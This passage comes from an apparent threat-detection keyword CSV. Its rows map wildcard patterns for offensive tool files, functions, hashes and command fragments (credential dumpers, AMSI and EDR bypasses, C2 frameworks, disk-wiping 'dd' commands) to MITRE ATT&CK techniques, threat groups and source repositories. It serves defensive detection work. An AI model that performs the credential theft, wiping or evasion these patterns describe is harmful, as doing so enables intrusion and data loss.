TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*dcsync.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*dcsync.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*dcsync@protonmail.com*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*dcsync_inject*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*dcsyncattack(*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*dcsyncattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*dcsyncattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*dcsyncclient.*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*dcsyncclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*dcsyncclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*dd if=/dev/nul*,greyware_tool_keyword,dd,Detects overwriting (effectively wiping/deleting) the file,T1070.004 - T1485,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*dd if=/dev/zero*,greyware_tool_keyword,dd,Detects overwriting (effectively wiping/deleting) the file,T1070.004 - T1485,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*dd310c7a9d558083387ae42d137624df205051094b619f59edf7899af42104c8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*DE7B9E6B-F73B-4573-A4C7-D314B528CFCB*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - 
TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*deb.torproject.org/torproject.org/*.asc*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*DebugAmsi.exe*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*DebugAmsi.sln*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*DebugAmsi.vcxproj*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*DebugAmsi-main*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*DebugAmsix64.exe*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z 
-*DebugAmsix86.exe*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*debugfs /dev/*,greyware_tool_keyword,debugdfs,Linux SIEM Bypass with debugdfs shell,T1059 - T1053 - T1037,TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*decoder-it/LocalPotato*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*Decode-RoutingPacket*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*decoy_document.xls*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*decrypt.py .\*.txt utf-16-le*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,0,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*decrypt_chrome_password.py*,offensive_tool_keyword,decrypt-chrome-passwords,A simple program to decrypt chrome password saved on your machine.,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/ohyicong/decrypt-chrome-passwords,1,1,N/A,10,7,673,147,2023-10-02T18:22:13Z,2020-12-28T15:11:12Z -*Decrypt-Bytes*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*decrypt-chrome-passwords-main*,offensive_tool_keyword,decrypt-chrome-passwords,A simple program to decrypt chrome password saved on your machine.,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/ohyicong/decrypt-chrome-passwords,1,1,N/A,10,7,673,147,2023-10-02T18:22:13Z,2020-12-28T15:11:12Z -*Decrypt-CipherText*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*DecryptNextCharacterWinSCP*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*decryptteamviewer*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DecryptWinSCPPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*DeEpinGh0st/Erebus*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*deepinstinct/ContainYourself*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*deepinstinct/LsassSilentProcessExit*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*deepinstinct/NoFilter*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*deepsound2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*deepzec*,offensive_tool_keyword,Github Username,Github Author of malicious scripts and eploitaiton tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/deepzec,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*defanger exclusion*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*defanger realtime*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*defanger signature*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*default_userpass_for_services_unhash*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
